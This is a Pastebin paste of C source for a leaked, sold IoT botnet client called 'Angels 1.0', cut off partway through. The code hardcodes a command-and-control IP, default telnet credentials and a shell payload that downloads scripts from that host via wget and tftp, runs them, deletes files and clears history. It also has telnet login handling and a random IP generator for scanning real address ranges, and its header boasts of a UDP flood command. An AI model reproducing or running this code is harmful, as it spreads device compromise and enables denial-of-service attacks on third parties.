Advertisement
UNTOUCHABLEHACKERGOD

angel.php's private client

Feb 7th, 2018
199
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 63.92 KB | None | 0 0
  1. ///////////////////////////////////
  2. //Made By Angels.php
  3. //Dont Skid Rip or leak!
  4. //This Reps
  5. //Build 1.0
  6. //$15
  7. //(Leaked) Still is a good client tho I like !* UDP IP PORT TIME 32 ack 0 10 the best btw shit slams
  8. //////////////////////////////////
  9. #include <stdlib.h>
  10. #include <stdarg.h>
  11. #include <stdio.h>
  12. #include <sys/socket.h>
  13. #include <sys/types.h>
  14. #include <netinet/in.h>
  15. #include <arpa/inet.h>
  16. #include <netdb.h>
  17. #include <signal.h>
  18. #include <strings.h>
  19. #include <string.h>
  20. #include <sys/utsname.h>
  21. #include <unistd.h>
  22. #include <fcntl.h>
  23. #include <errno.h>
  24. #include <netinet/ip.h>
  25. #include <netinet/udp.h>
  26. #include <netinet/tcp.h>
  27. #include <sys/wait.h>
  28. #include <sys/ioctl.h>
  29. #include <net/if.h>
  30. #include <time.h>
  31. #include <limits.h>
  32. #define PRE_SET_SEX 15
  33. #define SERVER_LIST_SEX (sizeof(hekkertelnet) / sizeof(unsigned char *))
  34. #define PAD_RIGHTZ 1
  35. #define PAD_Nefz 2
  36. #define PRINT_HOE 12
  37. #define CMD_IAN 255
  38. #define CMD_WILLY 251
  39. #define CMD_WONKER 252
  40. #define CMD_DILDO 253
  41. #define CMD_FAG 254
  42. #define OPT_PGA 3
  43. #define STD_PIGZ 75
  44. #define BUFFER_BITCH 1024
  45. #define PHI 0x9e3779b9
  46. #define VERSION "Angels 1.0"
  47. #define NETIS "AA\x00\x00AAAA"
  48. unsigned char *hekkertelnet[] = { "46.166.185.18" };
  49. int Server_Botport = 656;
  50. char *usernames[] = {"telnet\0"};
  51. char *passwords[] = {"telnet\0"};
  52. char* KGSVYGXA[] = {"BusyBox", "$", "#", (char*)0};
  53. char* SGSGWUD[] = {":", "ogin", "sername", "assword", (char*)0};
  54. char* bhuhwys[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", (char*)0};
  55. char* SGSGWUD2[] = {"nvalid", "ailed", "ncorrect", "enied", "rror", "oodbye", "bad", "BusyBox", "$", "#", (char*)0};
  56. char *hvgsgd = "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://46.166.185.18/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 46.166.185.18 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.166.185.18 ; chmod 777 tftp2.sh; sh tftp2.sh; rm -rf bins.sh tftp1.sh tftp2.sh; rm -rf *;history -c\r\n";
  57. int initConnection();
  58. int userID = 1;
  59. void makeRandomStr(unsigned char *buf, int length);
  60. int HackerPrint(int sock, char *formatStr, ...);
  61. char *inet_ntoa(struct in_addr in);
  62. int D1ckSucka = 0, D1ckSuckaz = -1;
  63. uint32_t *pids;
  64. uint32_t scanPid;
  65. uint32_t ngPid;
  66. uint64_t numpids = 0;
  67. struct in_addr ourIP;
  68. unsigned char macAddress[6] = {0};
  69. static uint32_t Q[4096], c = 362436;
  70. void init_rand(uint32_t x)
  71. {
  72. int i;
  73. Q[0] = x;
  74. Q[1] = x + PHI;
  75. Q[2] = x + PHI + PHI;
  76. for (i = 3; i < 4096; i++) Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  77. }
  78. uint32_t rand_cmwc(void)
  79. {
  80. uint64_t t, a = 18782LL;
  81. static uint32_t i = 4095;
  82. uint32_t x, r = 0xfffffffe;
  83. i = (i + 1) & 4095;
  84. t = a * Q[i] + c;
  85. c = (uint32_t)(t >> 32);
  86. x = t + c;
  87. if (x < c) {
  88. x++;
  89. c++;
  90. }
  91. return (Q[i] = r - x);
  92. }
  93. void trim(char *str)
  94. {
  95. int i;
  96. int begin = 0;
  97. int end = strlen(str) - 1;
  98. while (isspace(str[begin])) begin++;
  99. while ((end >= begin) && isspace(str[end])) end--;
  100. for (i = begin; i <= end; i++) str[i - begin] = str[i];
  101. str[i - begin] = '\0';
  102. }
  103. static void printchar(unsigned char **str, int c)
  104. {
  105. if (str) {
  106. **str = c;
  107. ++(*str);
  108. }
  109. else (void)write(1, &c, 1);
  110. }
  111. static int prints(unsigned char **out, const unsigned char *string, int width, int pad)
  112. {
  113. register int pc = 0, padchar = ' ';
  114. if (width > 0) {
  115. register int len = 0;
  116. register const unsigned char *ptr;
  117. for (ptr = string; *ptr; ++ptr) ++len;
  118. if (len >= width) width = 0;
  119. else width -= len;
  120. if (pad & PAD_Nefz) padchar = '0';
  121. }
  122. if (!(pad & PAD_RIGHTZ)) {
  123. for ( ; width > 0; --width) {
  124. printchar (out, padchar);
  125. ++pc;
  126. }
  127. }
  128. for ( ; *string ; ++string) {
  129. printchar (out, *string);
  130. ++pc;
  131. }
  132. for ( ; width > 0; --width) {
  133. printchar (out, padchar);
  134. ++pc;
  135. }
  136. return pc;
  137. }
  138. static int printi(unsigned char **out, int i, int b, int sg, int width, int pad, int letbase)
  139. {
  140. unsigned char print_buf[PRINT_HOE];
  141. register unsigned char *s;
  142. register int t, neg = 0, pc = 0;
  143. register unsigned int u = i;
  144. if (i == 0) {
  145. print_buf[0] = '0';
  146. print_buf[1] = '\0';
  147. return prints (out, print_buf, width, pad);
  148. }
  149. if (sg && b == 10 && i < 0) {
  150. neg = 1;
  151. u = -i;
  152. }
  153. s = print_buf + PRINT_HOE-1;
  154. *s = '\0';
  155. while (u) {
  156. t = u % b;
  157. if( t >= 10 )
  158. t += letbase - '0' - 10;
  159. *--s = t + '0';
  160. u /= b;
  161. }
  162. if (neg) {
  163. if( width && (pad & PAD_Nefz) ) {
  164. printchar (out, '-');
  165. ++pc;
  166. --width;
  167. }
  168. else {
  169. *--s = '-';
  170. }
  171. }
  172. return pc + prints (out, s, width, pad);
  173. }
  174. static int print(unsigned char **out, const unsigned char *format, va_list args )
  175. {
  176. register int width, pad;
  177. register int pc = 0;
  178. unsigned char scr[2];
  179. for (; *format != 0; ++format) {
  180. if (*format == '%') {
  181. ++format;
  182. width = pad = 0;
  183. if (*format == '\0') break;
  184. if (*format == '%') goto out;
  185. if (*format == '-') {
  186. ++format;
  187. pad = PAD_RIGHTZ;
  188. }
  189. while (*format == '0') {
  190. ++format;
  191. pad |= PAD_Nefz;
  192. }
  193. for ( ; *format >= '0' && *format <= '9'; ++format) {
  194. width *= 10;
  195. width += *format - '0';
  196. }
  197. if( *format == 's' ) {
  198. register char *s = (char *)va_arg( args, intptr_t );
  199. pc += prints (out, s?s:"(null)", width, pad);
  200. continue;
  201. }
  202. if( *format == 'd' ) {
  203. pc += printi (out, va_arg( args, int ), 10, 1, width, pad, 'a');
  204. continue;
  205. }
  206. if( *format == 'x' ) {
  207. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'a');
  208. continue;
  209. }
  210. if( *format == 'X' ) {
  211. pc += printi (out, va_arg( args, int ), 16, 0, width, pad, 'A');
  212. continue;
  213. }
  214. if( *format == 'u' ) {
  215. pc += printi (out, va_arg( args, int ), 10, 0, width, pad, 'a');
  216. continue;
  217. }
  218. if( *format == 'c' ) {
  219. scr[0] = (unsigned char)va_arg( args, int );
  220. scr[1] = '\0';
  221. pc += prints (out, scr, width, pad);
  222. continue;
  223. }
  224. }
  225. else {
  226. out:
  227. printchar (out, *format);
  228. ++pc;
  229. }
  230. }
  231. if (out) **out = '\0';
  232. va_end( args );
  233. return pc;
  234. }
  235. int zprintf(const unsigned char *format, ...)
  236. {
  237. va_list args;
  238. va_start( args, format );
  239. return print( 0, format, args );
  240. }
  241. int szprintf(unsigned char *out, const unsigned char *format, ...)
  242. {
  243. va_list args;
  244. va_start( args, format );
  245. return print( &out, format, args );
  246. }
  247. int HackerPrint(int sock, char *formatStr, ...)
  248. {
  249. unsigned char *textBuffer = malloc(2048);
  250. memset(textBuffer, 0, 2048);
  251. char *orig = textBuffer;
  252. va_list args;
  253. va_start(args, formatStr);
  254. print(&textBuffer, formatStr, args);
  255. va_end(args);
  256. orig[strlen(orig)] = '\n';
  257. //zprintf("buf: %s\n", orig);
  258. int q = send(sock,orig,strlen(orig), MSG_NOSIGNAL);
  259. free(orig);
  260. return q;
  261. }
  262. static int *fdopen_pids;
  263. int fdpopen(unsigned char *program, register unsigned char *type)
  264. {
  265. register int iop;
  266. int pdes[2], fds, pid;
  267. if (*type != 'r' && *type != 'w' || type[1]) return -1;
  268. if (pipe(pdes) < 0) return -1;
  269. if (fdopen_pids == NULL) {
  270. if ((fds = getdtablesize()) <= 0) return -1;
  271. if ((fdopen_pids = (int *)malloc((unsigned int)(fds * sizeof(int)))) == NULL) return -1;
  272. memset((unsigned char *)fdopen_pids, 0, fds * sizeof(int));
  273. }
  274. switch (pid = vfork())
  275. {
  276. case -1:
  277. close(pdes[0]);
  278. close(pdes[1]);
  279. return -1;
  280. case 0:
  281. if (*type == 'r') {
  282. if (pdes[1] != 1) {
  283. dup2(pdes[1], 1);
  284. close(pdes[1]);
  285. }
  286. close(pdes[0]);
  287. } else {
  288. if (pdes[0] != 0) {
  289. (void) dup2(pdes[0], 0);
  290. (void) close(pdes[0]);
  291. }
  292. (void) close(pdes[1]);
  293. }
  294. execl("/bin/sh", "sh", "-c", program, NULL);
  295. _exit(127);
  296. }
  297. if (*type == 'r') {
  298. iop = pdes[0];
  299. (void) close(pdes[1]);
  300. } else {
  301. iop = pdes[1];
  302. (void) close(pdes[0]);
  303. }
  304. fdopen_pids[iop] = pid;
  305. return (iop);
  306. }
  307. int fdpclose(int iop)
  308. {
  309. register int fdes;
  310. sigset_t omask, nmask;
  311. int pstat;
  312. register int pid;
  313. if (fdopen_pids == NULL || fdopen_pids[iop] == 0) return (-1);
  314. (void) close(iop);
  315. sigemptyset(&nmask);
  316. sigaddset(&nmask, SIGINT);
  317. sigaddset(&nmask, SIGQUIT);
  318. sigaddset(&nmask, SIGHUP);
  319. (void) sigprocmask(SIG_BLOCK, &nmask, &omask);
  320. do {
  321. pid = waitpid(fdopen_pids[iop], (int *) &pstat, 0);
  322. } while (pid == -1 && errno == EINTR);
  323. (void) sigprocmask(SIG_SETMASK, &omask, NULL);
  324. fdopen_pids[fdes] = 0;
  325. return (pid == -1 ? -1 : WEXITSTATUS(pstat));
  326. }
  327. unsigned char *fdgets(unsigned char *buffer, int bufferSize, int fd)
  328. {
  329. int got = 1, total = 0;
  330. while(got == 1 && total < bufferSize && *(buffer + total - 1) != '\n') { got = read(fd, buffer + total, 1); total++; }
  331. return got == 0 ? NULL : buffer;
  332. }
  333. static const long hextable[] = {
  334. [0 ... 255] = -1,
  335. ['0'] = 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
  336. ['A'] = 10, 11, 12, 13, 14, 15,
  337. ['a'] = 10, 11, 12, 13, 14, 15
  338. };
  339. long parseHex(unsigned char *hex)
  340. {
  341. long ret = 0;
  342. while (*hex && ret >= 0) ret = (ret << 4) | hextable[*hex++];
  343. return ret;
  344. }
  345. int wildString(const unsigned char* pattern, const unsigned char* string) {
  346. switch(*pattern)
  347. {
  348. case '\0': return *string;
  349. case '*': return !(!wildString(pattern+1, string) || *string && !wildString(pattern, string+1));
  350. case '?': return !(*string && !wildString(pattern+1, string+1));
  351. default: return !((toupper(*pattern) == toupper(*string)) && !wildString(pattern+1, string+1));
  352. }
  353. }
  354. int getHost(unsigned char *toGet, struct in_addr *i)
  355. {
  356. struct hostent *h;
  357. if((i->s_addr = inet_addr(toGet)) == -1) return 1;
  358. return 0;
  359. }
  360. void uppercase(unsigned char *str)
  361. {
  362. while(*str) { *str = toupper(*str); str++; }
  363. }
  364. void makeRandomStr(unsigned char *buf, int length)
  365. {
  366. int i = 0;
  367. for(i = 0; i < length; i++) buf[i] = (rand_cmwc()%(91-65))+65;
  368. }
  369. int recvLine(int socket, unsigned char *buf, int bufsize)
  370. {
  371. memset(buf, 0, bufsize);
  372. fd_set myset;
  373. struct timeval tv;
  374. tv.tv_sec = 30;
  375. tv.tv_usec = 0;
  376. FD_ZERO(&myset);
  377. FD_SET(socket, &myset);
  378. int selectRtn, retryCount;
  379. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  380. while(retryCount < 10)
  381. {
  382. HackerPrint(D1ckSucka, "PING");
  383. tv.tv_sec = 30;
  384. tv.tv_usec = 0;
  385. FD_ZERO(&myset);
  386. FD_SET(socket, &myset);
  387. if ((selectRtn = select(socket+1, &myset, NULL, &myset, &tv)) <= 0) {
  388. retryCount++;
  389. continue;
  390. }
  391. break;
  392. }
  393. }
  394. unsigned char tmpchr;
  395. unsigned char *cp;
  396. int count = 0;
  397. cp = buf;
  398. while(bufsize-- > 1)
  399. {
  400. if(recv(D1ckSucka, &tmpchr, 1, 0) != 1) {
  401. *cp = 0x00;
  402. return -1;
  403. }
  404. *cp++ = tmpchr;
  405. if(tmpchr == '\n') break;
  406. count++;
  407. }
  408. *cp = 0x00;
  409. // zprintf("recv: %s\n", cp);
  410. return count;
  411. }
  412. int hostname_to_ip(char * hostname , char* ip)
  413. {
  414. struct hostent *he;
  415. struct in_addr **addr_list;
  416. int i;
  417. if ( (he = gethostbyname( hostname ) ) == NULL)
  418. {
  419. // get the host info
  420. herror("gethostbyname");
  421. return 1;
  422. }
  423. addr_list = (struct in_addr **) he->h_addr_list;
  424. for(i = 0; addr_list[i] != NULL; i++)
  425. {
  426. //Return the first one;
  427. strcpy(ip , inet_ntoa(*addr_list[i]) );
  428. return 0;
  429. }
  430. return 1;
  431. }
  432. int connectTimeout(int fd, char *host, int port, int timeout)
  433. {
  434. struct sockaddr_in dest_addr;
  435. fd_set myset;
  436. struct timeval tv;
  437. socklen_t lon;
  438. int valopt;
  439. long arg = fcntl(fd, F_GETFL, NULL);
  440. arg |= O_NONBLOCK;
  441. fcntl(fd, F_SETFL, arg);
  442. dest_addr.sin_family = AF_INET;
  443. dest_addr.sin_port = htons(port);
  444. if(getHost(host, &dest_addr.sin_addr)) return 0;
  445. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
  446. int res = connect(fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
  447. if (res < 0) {
  448. if (errno == EINPROGRESS) {
  449. tv.tv_sec = timeout;
  450. tv.tv_usec = 0;
  451. FD_ZERO(&myset);
  452. FD_SET(fd, &myset);
  453. if (select(fd+1, NULL, &myset, NULL, &tv) > 0) {
  454. lon = sizeof(int);
  455. getsockopt(fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  456. if (valopt) return 0;
  457. }
  458. else return 0;
  459. }
  460. else return 0;
  461. }
  462. arg = fcntl(fd, F_GETFL, NULL);
  463. arg &= (~O_NONBLOCK);
  464. fcntl(fd, F_SETFL, arg);
  465. return 1;
  466. }
  467. int listFork()
  468. {
  469. uint32_t parent, *newpids, i;
  470. parent = fork();
  471. if (parent <= 0) return parent;
  472. numpids++;
  473. newpids = (uint32_t*)malloc((numpids + 1) * 4);
  474. for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
  475. newpids[numpids - 1] = parent;
  476. free(pids);
  477. pids = newpids;
  478. return parent;
  479. }
  480. int negotiate(int sock, unsigned char *buf, int len)
  481. {
  482. unsigned char c;
  483. switch (buf[1]) {
  484. case CMD_IAN: /*dropped an extra 0xFF wh00ps*/ return 0;
  485. case CMD_WILLY:
  486. case CMD_WONKER:
  487. case CMD_DILDO:
  488. case CMD_FAG:
  489. c = CMD_IAN;
  490. send(sock, &c, 1, MSG_NOSIGNAL);
  491. if (CMD_WONKER == buf[1]) c = CMD_FAG;
  492. else if (CMD_FAG == buf[1]) c = CMD_WONKER;
  493. else if (OPT_PGA == buf[1]) c = (buf[1] == CMD_DILDO ? CMD_WILLY : CMD_DILDO);
  494. else c = (buf[1] == CMD_DILDO ? CMD_WONKER : CMD_FAG);
  495. send(sock, &c, 1, MSG_NOSIGNAL);
  496. send(sock, &(buf[2]), 1, MSG_NOSIGNAL);
  497. break;
  498. default:
  499. break;
  500. }
  501. return 0;
  502. }
  503. int matchPrompt(char *bufStr)
  504. {
  505. char *prompts = ":>%$#\0";
  506. int bufLen = strlen(bufStr);
  507. int i, q = 0;
  508. for(i = 0; i < strlen(prompts); i++)
  509. {
  510. while(bufLen > q && (*(bufStr + bufLen - q) == 0x00 || *(bufStr + bufLen - q) == ' ' || *(bufStr + bufLen - q) == '\r' || *(bufStr + bufLen - q) == '\n')) q++;
  511. if(*(bufStr + bufLen - q) == prompts[i]) return 1;
  512. }
  513. return 0;
  514. }
  515. int readUntil(int fd, char *toFind, int matchLePrompt, int timeout, int timeoutusec, char *buffer, int bufSize, int initialIndex)
  516. {
  517. int bufferUsed = initialIndex, got = 0, found = 0;
  518. fd_set myset;
  519. struct timeval tv;
  520. tv.tv_sec = timeout;
  521. tv.tv_usec = timeoutusec;
  522. unsigned char *initialRead = NULL;
  523. while(bufferUsed + 2 < bufSize && (tv.tv_sec > 0 || tv.tv_usec > 0))
  524. {
  525. FD_ZERO(&myset);
  526. FD_SET(fd, &myset);
  527. if (select(fd+1, &myset, NULL, NULL, &tv) < 1) break;
  528. initialRead = buffer + bufferUsed;
  529. got = recv(fd, initialRead, 1, 0);
  530. if(got == -1 || got == 0) return 0;
  531. bufferUsed += got;
  532. if(*initialRead == 0xFF)
  533. {
  534. got = recv(fd, initialRead + 1, 2, 0);
  535. if(got == -1 || got == 0) return 0;
  536. bufferUsed += got;
  537. if(!negotiate(fd, initialRead, 3)) return 0;
  538. } else {
  539. if(strstr(buffer, toFind) != NULL || (matchLePrompt && matchPrompt(buffer))) { found = 1; break; }
  540. }
  541. }
  542. if(found) return 1;
  543. return 0;
  544. }
  545. static uint8_t ipState[5] = {0};
  546. in_addr_t HackerScan2()
  547. {
  548. ipState[1] = 0;
  549. ipState[2] = 0;
  550. ipState[3] = 0;
  551. ipState[4] = 0;
  552. ipState[1] = rand() % 255;
  553. ipState[2] = rand() % 255;
  554. ipState[3] = rand() % 255;
  555. ipState[4] = rand() % 255;
  556. int randnum = rand() % 214;
  557. char ip[16];
  558. if(randnum == 0)
  559. {
  560. szprintf(ip, "112.5.%d.%d", ipState[3], ipState[4]);
  561. }
  562. if(randnum == 1)
  563. {
  564. szprintf(ip, "117.165.%d.%d", ipState[3], ipState[4]);
  565. }
  566. if(randnum == 2)
  567. {
  568. szprintf(ip, "85.3.%d.%d", ipState[3], ipState[4]);
  569. }
  570. if(randnum == 3)
  571. {
  572. szprintf(ip, "37.158.%d.%d", ipState[3], ipState[4]);
  573. }
  574. if(randnum == 4)
  575. {
  576. szprintf(ip, "95.9.%d.%d", ipState[3], ipState[4]);
  577. }
  578. if(randnum == 5)
  579. {
  580. szprintf(ip, "41.252.%d.%d", ipState[3], ipState[4]);
  581. }
  582. if(randnum == 6)
  583. {
  584. szprintf(ip, "58.71.%d.%d", ipState[3], ipState[4]);
  585. }
  586. if(randnum == 7)
  587. {
  588. szprintf(ip, "104.55.%d.%d", ipState[3], ipState[4]);
  589. }
  590. if(randnum == 8)
  591. {
  592. szprintf(ip, "78.186.%d.%d", ipState[3], ipState[4]);
  593. }
  594. if(randnum == 9)
  595. {
  596. szprintf(ip, "78.189.%d.%d", ipState[3], ipState[4]);
  597. }
  598. if(randnum == 10)
  599. {
  600. szprintf(ip, "221.120.%d.%d", ipState[3], ipState[4]);
  601. }
  602. if(randnum == 11)
  603. {
  604. szprintf(ip, "88.5.%d.%d", ipState[3], ipState[4]);
  605. }
  606. if(randnum == 12)
  607. {
  608. szprintf(ip, "41.254.%d.%d", ipState[3], ipState[4]);
  609. }
  610. if(randnum == 13)
  611. {
  612. szprintf(ip, "103.20.%d.%d", ipState[3], ipState[4]);
  613. }
  614. if(randnum == 14)
  615. {
  616. szprintf(ip, "103.47.%d.%d", ipState[3], ipState[4]);
  617. }
  618. if(randnum == 15)
  619. {
  620. szprintf(ip, "103.57.%d.%d", ipState[3], ipState[4]);
  621. }
  622. if(randnum == 16)
  623. {
  624. szprintf(ip, "45.117.%d.%d", ipState[3], ipState[4]);
  625. }
  626. if(randnum == 17)
  627. {
  628. szprintf(ip, "101.51.%d.%d", ipState[3], ipState[4]);
  629. }
  630. if(randnum == 18)
  631. {
  632. szprintf(ip, "137.59.%d.%d", ipState[3], ipState[4]);
  633. }
  634. if(randnum == 19)
  635. {
  636. szprintf(ip, "1.56.%d.%d", ipState[3], ipState[4]);
  637. }
  638. if(randnum == 20)
  639. {
  640. szprintf(ip, "1.188.%d.%d", ipState[3], ipState[4]);
  641. }
  642. if(randnum == 21)
  643. {
  644. szprintf(ip, "14.204.%d.%d", ipState[3], ipState[4]);
  645. }
  646. if(randnum == 22)
  647. {
  648. szprintf(ip, "27.0.%d.%d", ipState[3], ipState[4]);
  649. }
  650. if(randnum == 23)
  651. {
  652. szprintf(ip, "27.8.%d.%d", ipState[3], ipState[4]);
  653. }
  654. if(randnum == 24)
  655. {
  656. szprintf(ip, "27.50.%d.%d", ipState[3], ipState[4]);
  657. }
  658. if(randnum == 25)
  659. {
  660. szprintf(ip, "27.54.%d.%d", ipState[3], ipState[4]);
  661. }
  662. if(randnum == 26)
  663. {
  664. szprintf(ip, "27.98.%d.%d", ipState[3], ipState[4]);
  665. }
  666. if(randnum == 27)
  667. {
  668. szprintf(ip, "27.112.%d.%d", ipState[3], ipState[4]);
  669. }
  670. if(randnum == 28)
  671. {
  672. szprintf(ip, "27.192.%d.%d", ipState[3], ipState[4]);
  673. }
  674. if(randnum == 29)
  675. {
  676. szprintf(ip, "36.32.%d.%d", ipState[3], ipState[4]);
  677. }
  678. if(randnum == 30)
  679. {
  680. szprintf(ip, "36.248.%d.%d", ipState[3], ipState[4]);
  681. }
  682. if(randnum == 31)
  683. {
  684. szprintf(ip, "39.64.%d.%d", ipState[3], ipState[4]);
  685. }
  686. if(randnum == 32)
  687. {
  688. szprintf(ip, "42.4.%d.%d", ipState[3], ipState[4]);
  689. }
  690. if(randnum == 33)
  691. {
  692. szprintf(ip, "42.48.%d.%d", ipState[3], ipState[4]);
  693. }
  694. if(randnum == 34)
  695. {
  696. szprintf(ip, "42.52.%d.%d", ipState[3], ipState[4]);
  697. }
  698. if(randnum == 35)
  699. {
  700. szprintf(ip, "42.56.%d.%d", ipState[3], ipState[4]);
  701. }
  702. if(randnum == 36)
  703. {
  704. szprintf(ip, "42.63.%d.%d", ipState[3], ipState[4]);
  705. }
  706. if(randnum == 37)
  707. {
  708. szprintf(ip, "42.84.%d.%d", ipState[3], ipState[4]);
  709. }
  710. if(randnum == 38)
  711. {
  712. szprintf(ip, "42.176.%d.%d", ipState[3], ipState[4]);
  713. }
  714. if(randnum == 39)
  715. {
  716. szprintf(ip, "42.224.%d.%d", ipState[3], ipState[4]);
  717. }
  718. if(randnum == 40)
  719. {
  720. szprintf(ip, "42.176.%d.%d", ipState[3], ipState[4]);
  721. }
  722. if(randnum == 41)
  723. {
  724. szprintf(ip, "43.253.%d.%d", ipState[3], ipState[4]);
  725. }
  726. if(randnum == 42)
  727. {
  728. szprintf(ip, "43.230.%d.%d", ipState[3], ipState[4]);
  729. }
  730. if(randnum == 43)
  731. {
  732. szprintf(ip, "163.53.%d.%d", ipState[3], ipState[4]);
  733. }
  734. if(randnum == 44)
  735. {
  736. szprintf(ip, "43.230.%d.%d", ipState[3], ipState[4]);
  737. }
  738. if(randnum == 45)
  739. {
  740. szprintf(ip, "62.252.%d.%d", ipState[3], ipState[4]);
  741. }
  742. if(randnum == 46)
  743. {
  744. szprintf(ip, "43.245.%d.%d", ipState[3], ipState[4]);
  745. }
  746. if(randnum == 47)
  747. {
  748. szprintf(ip, "62.255.%d.%d", ipState[3], ipState[4]);
  749. }
  750. if(randnum == 48)
  751. {
  752. szprintf(ip, "77.96.%d.%d", ipState[3], ipState[4]);
  753. }
  754. if(randnum == 49)
  755. {
  756. szprintf(ip, "77.97.%d.%d", ipState[3], ipState[4]);
  757. }
  758. if(randnum == 50)
  759. {
  760. szprintf(ip, "77.98.%d.%d", ipState[3], ipState[4]);
  761. }
  762. if(randnum == 51)
  763. {
  764. szprintf(ip, "77.100.%d.%d", ipState[3], ipState[4]);
  765. }
  766. if(randnum == 52)
  767. {
  768. szprintf(ip, "77.102.%d.%d", ipState[3], ipState[4]);
  769. }
  770. if(randnum ==53)
  771. {
  772. szprintf(ip, "113.191.%d.%d", ipState[3], ipState[4]);
  773. }
  774. if(randnum == 54)
  775. {
  776. szprintf(ip, "81.100.%d.%d", ipState[3], ipState[4]);
  777. }
  778. if(randnum == 55)
  779. {
  780. szprintf(ip, "113.188.%d.%d", ipState[3], ipState[4]);
  781. }
  782. if(randnum == 56)
  783. {
  784. szprintf(ip, "113.189.%d.%d", ipState[3], ipState[4]);
  785. }
  786. if(randnum == 57)
  787. {
  788. szprintf(ip, "94.174.%d.%d", ipState[3], ipState[4]);
  789. }
  790. if(randnum == 58)
  791. {
  792. szprintf(ip, "14.160.%d.%d", ipState[3], ipState[4]);
  793. }
  794. if(randnum == 59)
  795. {
  796. szprintf(ip, "14.161.%d.%d", ipState[3], ipState[4]);
  797. }
  798. if(randnum == 60)
  799. {
  800. szprintf(ip, "14.162.%d.%d", ipState[3], ipState[4]);
  801. }
  802. if(randnum == 61)
  803. {
  804. szprintf(ip, "14.163.%d.%d", ipState[3], ipState[4]);
  805. }
  806. if(randnum == 62)
  807. {
  808. szprintf(ip, "14.164.%d.%d", ipState[3], ipState[4]);
  809. }
  810. if(randnum == 63)
  811. {
  812. szprintf(ip, "14.165.%d.%d", ipState[3], ipState[4]);
  813. }
  814. if(randnum == 64)
  815. {
  816. szprintf(ip, "14.166.%d.%d", ipState[3], ipState[4]);
  817. }
  818. if(randnum == 65)
  819. {
  820. szprintf(ip, "14.167.%d.%d", ipState[3], ipState[4]);
  821. }
  822. if(randnum == 66)
  823. {
  824. szprintf(ip, "14.168.%d.%d", ipState[3], ipState[4]);
  825. }
  826. if(randnum == 67)
  827. {
  828. szprintf(ip, "14.169.%d.%d", ipState[3], ipState[4]);
  829. }
  830. if(randnum == 68)
  831. {
  832. szprintf(ip, "14.170.%d.%d", ipState[3], ipState[4]);
  833. }
  834. if(randnum == 69)
  835. {
  836. szprintf(ip, "14.171.%d.%d", ipState[3], ipState[4]);
  837. }
  838. if(randnum == 70)
  839. {
  840. szprintf(ip, "14.172.%d.%d", ipState[3], ipState[4]);
  841. }
  842. if(randnum == 71)
  843. {
  844. szprintf(ip, "14.173.%d.%d", ipState[3], ipState[4]);
  845. }
  846. if(randnum == 72)
  847. {
  848. szprintf(ip, "14.174.%d.%d", ipState[3], ipState[4]);
  849. }
  850. if(randnum == 73)
  851. {
  852. szprintf(ip, "14.175.%d.%d", ipState[3], ipState[4]);
  853. }
  854. if(randnum == 74)
  855. {
  856. szprintf(ip, "14.176.%d.%d", ipState[3], ipState[4]);
  857. }
  858. if(randnum == 75)
  859. {
  860. szprintf(ip, "14.177.%d.%d", ipState[3], ipState[4]);
  861. }
  862. if(randnum == 76)
  863. {
  864. szprintf(ip, "14.178.%d.%d", ipState[3], ipState[4]);
  865. }
  866. if(randnum == 77)
  867. {
  868. szprintf(ip, "14.179.%d.%d", ipState[3], ipState[4]);
  869. }
  870. if(randnum == 78)
  871. {
  872. szprintf(ip, "14.180.%d.%d", ipState[3], ipState[4]);
  873. }
  874. if(randnum == 79)
  875. {
  876. szprintf(ip, "14.181.%d.%d", ipState[3], ipState[4]);
  877. }
  878. if(randnum == 80)
  879. {
  880. szprintf(ip, "14.182.%d.%d", ipState[3], ipState[4]);
  881. }
  882. if(randnum == 81)
  883. {
  884. szprintf(ip, "14.183.%d.%d", ipState[3], ipState[4]);
  885. }
  886. if(randnum == 82)
  887. {
  888. szprintf(ip, "14.184.%d.%d", ipState[3], ipState[4]);
  889. }
  890. if(randnum == 83)
  891. {
  892. szprintf(ip, "14.185.%d.%d", ipState[3], ipState[4]);
  893. }
  894. if(randnum == 84)
  895. {
  896. szprintf(ip, "14.186.%d.%d", ipState[3], ipState[4]);
  897. }
  898. if(randnum == 85)
  899. {
  900. szprintf(ip, "14.187.%d.%d", ipState[3], ipState[4]);
  901. }
  902. if(randnum == 86)
  903. {
  904. szprintf(ip, "14.188.%d.%d", ipState[3], ipState[4]);
  905. }
  906. if(randnum == 87)
  907. {
  908. szprintf(ip, "14.189.%d.%d", ipState[3], ipState[4]);
  909. }
  910. if(randnum == 88)
  911. {
  912. szprintf(ip, "14.190.%d.%d", ipState[3], ipState[4]);
  913. }
  914. if(randnum == 89)
  915. {
  916. szprintf(ip, "14.191.%d.%d", ipState[3], ipState[4]);
  917. }
  918. if(randnum == 90)
  919. {
  920. szprintf(ip, "45.121.%d.%d", ipState[3], ipState[4]);
  921. }
  922. if(randnum == 91)
  923. {
  924. szprintf(ip, "45.120.%d.%d", ipState[3], ipState[4]);
  925. }
  926. if(randnum == 92)
  927. {
  928. szprintf(ip, "45.115.%d.%d", ipState[3], ipState[4]);
  929. }
  930. if(randnum == 93)
  931. {
  932. szprintf(ip, "43.252.%d.%d", ipState[3], ipState[4]);
  933. }
  934. if(randnum == 94)
  935. {
  936. szprintf(ip, "43.230.%d.%d", ipState[3], ipState[4]);
  937. }
  938. if(randnum == 95)
  939. {
  940. szprintf(ip, "43.240.%d.%d", ipState[3], ipState[4]);
  941. }
  942. if(randnum == 96)
  943. {
  944. szprintf(ip, "43.245.%d.%d", ipState[3], ipState[4]);
  945. }
  946. if(randnum == 97)
  947. {
  948. szprintf(ip, "41.174.%d.%d", ipState[3], ipState[4]);
  949. }
  950. if(randnum == 98)
  951. {
  952. szprintf(ip, "49.118.%d.%d", ipState[3], ipState[4]);
  953. }
